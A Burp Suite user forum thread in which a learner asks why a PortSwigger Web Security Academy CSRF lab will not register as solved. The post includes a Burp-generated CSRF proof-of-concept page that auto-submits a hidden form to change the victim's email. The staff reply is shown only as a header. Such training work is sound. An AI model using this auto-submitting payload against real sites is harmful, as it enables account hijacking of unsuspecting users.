The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

solved the lab and not appearing as solved

Malek | Last updated: Oct 01, 2024 06:16PM UTC

I tried everything and it is not working i even tried chrome and firefox both are not working LAB:CSRF where token validation depends on request method my code : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0ae700ed035a4ad680378079006900c1.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="Hacker@gmail.com" /> <input type="hidden" name="csrf" value="2PsbBOK7XVqG8kxGucPmtoPSqpd8bZP8" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:20AM UTC